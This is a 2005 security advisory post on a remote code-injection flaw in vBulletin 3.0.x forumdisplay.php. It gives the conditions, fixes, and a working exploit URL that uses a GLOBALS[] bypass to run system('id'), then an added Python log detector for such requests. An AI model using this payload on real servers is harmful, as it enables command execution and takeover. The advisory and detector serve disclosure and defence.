Proof of concept On 13 Feb 2005 17:16:35 -0000, AL3NDALEEB <al3ndaleeb@xxxxxxx> wrote:
Vulnerable Systems:
----------------
vBulletin version 3.0 up to and including version 3.0.4

Immune systems:
----------------
vBulletin version 3.0.5
vBulletin version 3.0.6

Vulnerable code in forumdisplay.php :
#############################################################
if ($vboptions['showforumusers']) {
    ....
    if ($bbuserinfo['userid']) {
        ....
        $comma = ', ';
    }
    ....
    while ($loggedin = $DB_site->fetch_array($forumusers)) {
        ...
        eval('$activeusers .= "' . $comma . fetch_template('forumdisplay_loggedinuser') . '";');   <<==== (Vuln)
        $comma = ', ';
        ..
    }
    ..
}
#############################################################

Conditions:
----------------
1st condition : $vboptions['showforumusers'] == True , the admin must set showforumusers ON in vbulletin options.
2nd condition : $bbuserinfo['userid'] == 0 , you must be a visitor/guest.
3rd condition : $DB_site->fetch_array($forumusers) == True , when you visit the forums, it must have at least one user shown in the forum.
4th condition : magic_quotes_gpc must be OFF
SPECIAL condition : you must bypass unset($GLOBALS["$_arrykey"]) code in init.php by secret array GLOBALS[]=1 ;)))

Solutions:
----------------
* Disable showforumusers in vbulletin options .
* add the next line before if ($vboptions['showforumusers']) :
  $comma = '';

Exploit:
----------------
example : http://site/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."
-- Using Opera's revolutionary e-mail client: http://www.opera.com/m2/
Attachment:
vbulletin304-xp.pl
Description: Binary data
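For anyone reviewing web server logs for attempts against this bug, the following is an added detection example written for this page; it is not code from the original post, from the attached script, or from vBulletin. It parses constructed Apache combined-format access-log lines (the IPs, hostnames and timestamps are made up) and flags requests that carry the two markers visible in the advisory's own exploit URL: a query key beginning with GLOBALS (the init.php unset() bypass) and a parameter value that breaks out of a double-quoted PHP string. The rule names, the log format assumption and the sample lines are all assumptions of this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines (Apache combined format, made-up IPs and timestamps).
# Line 2 is the advisory's exploit URL, line 3 carries only the GLOBALS[] bypass marker
# (URL-encoded), lines 1 and 4 are ordinary requests.
SAMPLE_LOG = """\
203.0.113.5 - - [13/Feb/2005:17:20:01 +0000] "GET /forumdisplay.php?f=2 HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
203.0.113.9 - - [13/Feb/2005:17:20:07 +0000] "GET /forumdisplay.php?GLOBALS[]=1&f=2&comma=%22.system(%27id%27).%22 HTTP/1.1" 200 611 "-" "Opera/7.5"
203.0.113.9 - - [13/Feb/2005:17:20:09 +0000] "GET /forumdisplay.php?GLOBALS%5B%5D=1&f=2 HTTP/1.1" 200 4870 "-" "Opera/7.5"
198.51.100.2 - - [13/Feb/2005:17:21:00 +0000] "GET /showthread.php?t=10 HTTP/1.1" 200 9000 "-" "Mozilla/5.0"
"""

# Client IP, timestamp and the request line of an Apache combined-format entry (assumed format).
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"'
)

# A double quote immediately followed by "." or "(", or "." / ")" followed by a double quote:
# the characters needed to close the "..." string inside the eval() shown in the advisory.
# Deliberately narrow; widen it for your own environment.
PHP_BREAKOUT_RE = re.compile(r'"\s*[.(]|[.)]\s*"')


def classify_request(target: str) -> list:
    """Return the list of reason tags (hypothetical names) that apply to one request target."""
    reasons = []
    query = urlsplit(target).query
    # parse_qsl percent-decodes keys and values, so GLOBALS%5B%5D and GLOBALS[] look the same.
    for key, value in parse_qsl(query, keep_blank_values=True):
        if key.startswith("GLOBALS") and "globals_array_key" not in reasons:
            reasons.append("globals_array_key")
        if PHP_BREAKOUT_RE.search(value) and "php_string_breakout" not in reasons:
            reasons.append("php_string_breakout")
    return reasons


def scan_log(log_text: str) -> list:
    """Parse each log line and collect the requests that trip at least one rule."""
    findings = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue  # not a request line we understand; skip rather than guess
        reasons = classify_request(match.group("target"))
        if reasons:
            findings.append({
                "ip": match.group("ip"),
                "time": match.group("ts"),
                "path": urlsplit(match.group("target")).path,
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding["time"], finding["ip"], finding["path"], ", ".join(finding["reasons"]))
```

Run it as a script to see the two flagged requests; both rules fire on the advisory's URL, only the GLOBALS rule on the bare bypass. A GLOBALS-prefixed query key has no legitimate use against a register_globals-era application, so that rule alone is a reasonable alert; the string-breakout rule is kept separate because quotes can appear in ordinary search input.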